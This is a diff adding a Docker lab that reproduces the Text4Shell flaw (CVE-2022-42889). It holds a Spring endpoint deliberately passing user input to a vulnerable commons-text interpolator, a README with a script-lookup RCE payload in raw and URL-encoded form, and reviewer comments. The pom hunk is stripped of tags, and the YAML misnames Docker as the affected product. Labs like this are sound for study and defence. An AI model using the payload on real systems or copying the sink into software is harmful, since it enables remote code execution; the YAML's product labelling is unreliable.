diff --git a/cve/docker/2022/cve-2022-42889/Dockerfile b/cve/docker/2022/cve-2022-42889/Dockerfile
new file mode 100644
index 0000000000000000000000000000000000000000..a31999b91fab071fdfe928817bef173cc5e7aab7
--- /dev/null
+++ b/cve/docker/2022/cve-2022-42889/Dockerfile
@@ -0,0 +1,18 @@
+# Use an official OpenJDK runtime as a parent image
+FROM openjdk:8-jre-alpine
+
+# set shell to bash
+# source: https://stackoverflow.com/a/40944512/3128926
+RUN apk update && apk add bash
+
+# Set the working directory to /app
+WORKDIR /app
+
+# Copy the fat jar into the container at /app
+COPY /target/text4shell-poc.jar /app
+
+# Make port 8080 available to the world outside this container
+EXPOSE 8080
+
+# Run jar file when the container launches
+CMD ["java", "-jar", "text4shell-poc.jar"]
\ No newline at end of file
diff --git a/cve/docker/2022/cve-2022-42889/README.md b/cve/docker/2022/cve-2022-42889/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..2452d91ef4a4b8017f11eca516c251d4419c058e
--- /dev/null
+++ b/cve/docker/2022/cve-2022-42889/README.md
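Review bot: No `USER` directive follows the `COPY`, so the JVM started by `CMD` — and anything a triggered lookup makes it spawn — runs as root inside the container; on this alpine base `RUN adduser -D app` followed by `USER app` before `CMD` keeps the lab working while bounding what a successful trigger can reach. The comment `# set shell to bash` is misleading: the `RUN` line only installs bash and there is no `SHELL` directive, so it should read `# install bash so the container can be entered with docker exec`. `apk update && apk add bash` also leaves the package index in the image layer; `RUN apk add --no-cache bash` is the usual form. The `openjdk:8-jre-alpine` tag appears to be one that is no longer updated upstream, which is worth recording in a comment so the pin reads as a deliberate choice for this reproduction rather than an oversight.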
@@ -0,0 +1,61 @@
+### Install maven - [maven-linux](https://www.digitalocean.com/community/tutorials/install-maven-linux-ubuntu)
+-------------
+
+
+1. Maven install to create the fat jar
+
+```
+mvn clean install
+```
+
+2. Docker build
+
+```
+docker build --tag=text4shell .
+```
+
+3. Docker run
+
+```
+docker run -p 80:8080 text4shell
+```
+
+4. Test the app
+
+```
+http://localhost/text4shell/attack?search=
+```
+
+5. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:
+
+```
+${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}
+```
+
+http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D
+
+6. You can also try using `dns` or `url` prefixes.
+
+7. Get the container id
+
+```
+docker container ls
+```
+
+8. Get into the app
+
+```
+docker exec -it bash
+```
+
+9. To check if above RCE was successful (You should see a file named `foo` created in the `/tmp` directory):
+
+```
+ls /tmp/
+```
+
+10. To stop the container
+
+```
+docker container stop
+```
\ No newline at end of file
diff --git a/cve/docker/2022/cve-2022-42889/pom.xml b/cve/docker/2022/cve-2022-42889/pom.xml
new file mode 100644
index 0000000000000000000000000000000000000000..800842586bfdaaad3e9c489d49b4a584135674c2
--- /dev/null
+++ b/cve/docker/2022/cve-2022-42889/pom.xml
@@ -0,0 +1,46 @@
+ + 4.0.0 + com.levo.dockerexample + docker-java-app-example + jar + 1.0-SNAPSHOT + docker-java-app-example + http://maven.apache.org + + + UTF-8 + UTF-8 + 1.8 + com.levo.dockerexample.DockerApp + + + + org.springframework.boot + spring-boot-starter-parent + 2.1.1.RELEASE + + + + + org.springframework.boot + spring-boot-starter-web + + + org.apache.commons + commons-text + 1.8 + + + + + text4shell-poc + + + org.springframework.boot + spring-boot-maven-plugin + + + + +
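Review bot: The `commons-text` `1.8` pin is the whole point of this lab, yet nothing in the pom records that, so a routine dependency bump would silently break the reproduction; I'd place `<!-- intentionally pinned: CVE-2022-42889 affects commons-text 1.5 through 1.9, fixed in 1.10.0 -->` directly above that version element. The element names were stripped in this rendering, so I am reading the hunk from its values only and cannot check the surrounding structure. The `spring-boot-starter-parent` `2.1.1.RELEASE` parent and the `1.8` Java level also look deliberately old; if that is intentional the same one-line comment treatment applies, and if not they are separate upgrades from the commons-text pin.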
diff --git a/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java
new file mode 100644
index 0000000000000000000000000000000000000000..d1d037bffd167242f77959c9f5c918601d3934f6
--- /dev/null
+++ b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/DockerApp.java
@@ -0,0 +1,11 @@
+package com.levo.dockerexample;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class DockerApp {
+ public static void main(String[] args) {
+ SpringApplication.run(DockerApp.class, args);
+ }
+}
diff --git a/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java
new file mode 100644
index 0000000000000000000000000000000000000000..b4fa1922a297fcf6ce5f0dd992aa8193b7adf6fd
--- /dev/null
+++ b/cve/docker/2022/cve-2022-42889/src/main/java/com/levo/dockerexample/controller/HelloController.java
@@ -0,0 +1,30 @@
+package com.levo.dockerexample.controller;
+
+import java.util.Date;
+
+import org.apache.commons.text.StringSubstitutor;
+
+import org.springframework.web.bind.annotation.ResponseBody;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestMethod;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+@RequestMapping("text4shell")
+public class HelloController {
+
+ @RequestMapping(value = "/attack", method = RequestMethod.GET)
+ @ResponseBody
+ public String attack(@RequestParam(defaultValue="5up3r541y4n") String search) {
+ StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
+ // String pocstring = "${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}";
+ try{
+ String pwn = interpolator.replace(search);
+ } catch(Exception e) {
+ System.out.println(e);
+ }
+ return "Search results for: " + search;
+ }
+
+}
diff --git a/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java b/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java
new file mode 100644
index 0000000000000000000000000000000000000000..300beb32648e704866ef08ba54a8f36c972c973e
--- /dev/null
+++ b/cve/docker/2022/cve-2022-42889/src/test/java/com/levo/dockerexample/PlaceHolderForTest.java
@@ -0,0 +1,5 @@
+package com.levo.dockerexample;
+
+public class PlaceHolderForTest {
+
+}
diff --git a/cve/docker/2022/yaml/cve-2022-42889.yaml b/cve/docker/2022/yaml/cve-2022-42889.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..5672cca76c55bc8c01d04e91225684820271e2cb
--- /dev/null
+++ b/cve/docker/2022/yaml/cve-2022-42889.yaml
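Review bot: `attack` throws away the interpolation result (`pwn` is assigned and never read) and the `catch(Exception e)` block only prints `e` to stdout, so a lookup that fires leaves no application-side record other than a console line; for a lab meant to show what a vulnerable sink looks like I'd at least keep the outcome visible, e.g. `System.out.println("interpolated: " + pwn);` inside the try, or route both the result and the exception through a logger rather than stdout. The call `StringSubstitutor.createInterpolator()` deserves a comment naming it as the deliberate sink, `// createInterpolator() on commons-text 1.8 enables the default script/dns/url lookups; this is the CVE-2022-42889 sink`, since the only hint today is the commented-out `pocstring` line. `import java.util.Date;` is unused, and `@ResponseBody` is redundant on a method of a `@RestController`. The `search` value is also echoed unescaped into the response; whether that is rendered as HTML depends on content negotiation outside this hunk, but a text/plain `produces` on the mapping would remove the doubt.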
@@ -0,0 +1,20 @@
+id: cve-2022-42889
+source:
+ https://github.com/karthikuj/cve-2022-42889-text4shell-docker
+info:
+ name: Docker是美国Docker公司的一款开源的应用容器引擎。该产品支持在Linux系统上创建一个容器(轻量级虚拟机)并部署和运行应用程序,以及通过配置文件实现应用程序的自动化安装、部署和升级。
+ severity: CRITICAL
+ description: |
+ Apache Commons Text执行变量插值,允许动态评估和扩展属性。插值的标准格式是“${prefix:name}”,其中“前缀”用于定位执行插值的org.apache.commons.text.lookup.StringLookup的实例。从版本 1.5 开始一直到 1.9,默认查找实例集包括可能导致任意代码执行或与远程服务器联系的插值器。这些查找是: - “脚本” - 使用 JVM 脚本执行引擎 (javax.script) 执行表达式 - “DNS” - 解析 DNS 记录 - “网址” - 从 URL 加载值,包括从远程服务器加载值 如果使用不受信任的配置值,则在受影响版本中使用插值默认值的应用程序可能容易受到远程代码执行或与远程服务器的意外联系。建议用户升级到Apache Commons Text 1.10.0,默认情况下禁用有问题的插值器。
+ scope-of-influence:
+ Docker 1.5-1.10.0
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-42889
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: cve-2022-42889
+ cwe-id: CWE-94
+ cnvd-id: None
+ kve-id: None
+ tags: Docker,cve2022
\ No newline at end of file
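Review bot: `scope-of-influence: Docker 1.5-1.10.0` contradicts the `description` in the same file, which places the flaw in Apache Commons Text 1.5 through 1.9 and names 1.10.0 as the fixed release; the affected product is the library, not Docker, and the range should exclude the fix, e.g. `Apache Commons Text 1.5-1.9`. The `name` field likewise describes Docker rather than Commons Text, and `tags: Docker,cve2022` carries the same mislabel, so anyone filtering this feed by product will be misrouted; the lab merely ships in a container. The `source:` value is a bare scalar while `reference:` below uses a list item; presumably the schema allows both, but making the two consistent would spare downstream parsers a special case.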